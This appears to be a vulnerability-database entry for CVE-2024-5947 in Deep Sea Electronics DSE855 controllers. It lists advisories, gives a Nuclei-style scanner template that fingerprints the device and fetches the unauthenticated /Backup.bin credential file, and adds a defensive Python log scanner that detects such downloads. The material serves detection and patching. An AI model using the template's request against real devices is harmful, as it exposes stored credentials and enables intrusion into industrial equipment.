| Title | Published | Views | Family |
|---|---|---|---|
| Deep Sea Electronics DSE855 Remote Authentication Bypass Vulnerability | 3 Jul 2024 00:00 | – | zdt |
| CVE-2024-5947 | 1 Sep 2024 01:57 | – | circl |
| Deep Sea Electronics DSE855 Security Vulnerability | 13 Jun 2024 00:00 | – | cnnvd |
| CVE-2024-5947 | 13 Jun 2024 19:40 | – | cve |
| CVE-2024-5947 Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability | 13 Jun 2024 19:40 | – | cvelist |
| Deep Sea Electronics DSE855 | 24 Oct 2024 06:00 | – | ics |
| CVE-2024-5947 | 13 Jun 2024 20:15 | – | nvd |
| CVE-2024-5947 | 13 Jun 2024 20:15 | – | osv |
| Deep Sea Electronics DSE855 Remote Authentication Bypass | 3 Jul 2024 00:00 | – | packetstorm |
| PT-2024-37261 · Deep Sea Electronics · Dse855 | 13 Jun 2024 00:00 | – | ptsecurity |

| Source | Link |
|---|---|
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2024-5947 |
| packetstormsecurity | www.packetstormsecurity.com/files/179342/Deep-Sea-Electronics-DSE855-Remote-Authentication-Bypass.html |
| zerodayinitiative | www.zerodayinitiative.com/advisories/ZDI-24-671/ |

```yaml
id: CVE-2024-5947

info:
  name: Deep Sea Electronics DSE855 - Authentication Bypass
  author: s4e-io
  severity: medium
  description: |
    Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.
  impact: |
    Unauthenticated network-adjacent attackers can download configuration backup files containing stored credentials without authentication.
  remediation: |
    Contact Deep Sea Electronics for a firmware update that addresses the authentication bypass vulnerability in DSE855 devices.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5947
    - https://packetstormsecurity.com/files/179342/Deep-Sea-Electronics-DSE855-Remote-Authentication-Bypass.html
    - https://www.zerodayinitiative.com/advisories/ZDI-24-671/
  classification:
    epss-score: 0.02418
    epss-percentile: 0.82141
  metadata:
    verified: "true"
    max-request: 1
    vendor: Deep Sea Electronics
    product: DSE855
    fofa-query: "Deep Sea Electronics"
  tags: packetstorm,cve,cve2024,bypass,info-leak,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"Copyright Deep Sea Electronics")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /Backup.bin HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type,"Unknown")'
          - "status_code == 200"
        condition: and
# digest: 4a0a004730450220551b95d37caf1771491d8606301f3de48c207d098e106efb69f0c35ea0ad3c6b02210091c6a9107d6b49ca3a5aa3eeb6b4796963e3d90a9d8ccb4e9a24534778eb5143:922c64590222798bb761d5b6d8e72950
```
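
A defender-side companion to the template, added here as an example and not part of the original template or of the vendor's tooling: it scans access-log lines for successful downloads of `/Backup.bin`, the path the template requests. It assumes Combined Log Format logs from a reverse proxy placed in front of the controller; the log source, the sample lines and the allow-list address are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format, as written by a reverse proxy in front of the controller
# (assumption: the DSE855 itself is not the log source).
LOG_RE = re.compile(
    r'(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
BACKUP_PATH = "/backup.bin"  # path from the template, compared case-insensitively


def normalize_path(target):
    """Drop the query string, percent-decode once, collapse duplicate slashes."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()


def find_backup_downloads(lines, allowed_clients=frozenset()):
    """Return one finding per HTTP 200 backup download from a non-allowed client."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format
        if normalize_path(m["target"]) != BACKUP_PATH:
            continue
        if m["status"] != "200" or m["client"] in allowed_clients:
            continue  # request was refused, or came from an approved backup host
        size = 0 if m["size"] == "-" else int(m["size"])
        findings.append({"client": m["client"], "time": m["ts"],
                         "user": m["user"], "bytes": size})
    return findings


# Constructed sample log lines (not from a real device or network).
SAMPLE_LOG = [
    '10.20.0.15 - - [13/Jun/2024:20:15:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "curl/8.5.0"',
    '10.20.0.15 - - [13/Jun/2024:20:15:03 +0000] "GET /Backup.bin HTTP/1.1" 200 20480 "-" "curl/8.5.0"',
    '10.20.0.77 - - [13/Jun/2024:20:16:40 +0000] "GET /%42ackup.bin?x=1 HTTP/1.1" 200 20480 "-" "-"',
    '10.20.0.90 - - [13/Jun/2024:20:17:11 +0000] "GET /Backup.bin HTTP/1.1" 401 0 "-" "-"',
    '10.20.0.5 - - [13/Jun/2024:20:18:00 +0000] "GET /Backup.bin HTTP/1.1" 200 20480 "-" "backup-job"',
]

if __name__ == "__main__":
    for finding in find_backup_downloads(SAMPLE_LOG, allowed_clients={"10.20.0.5"}):
        print(finding)
```

Any finding means a backup file, and the credentials stored in it, left the device; treat those credentials as exposed and rotate them.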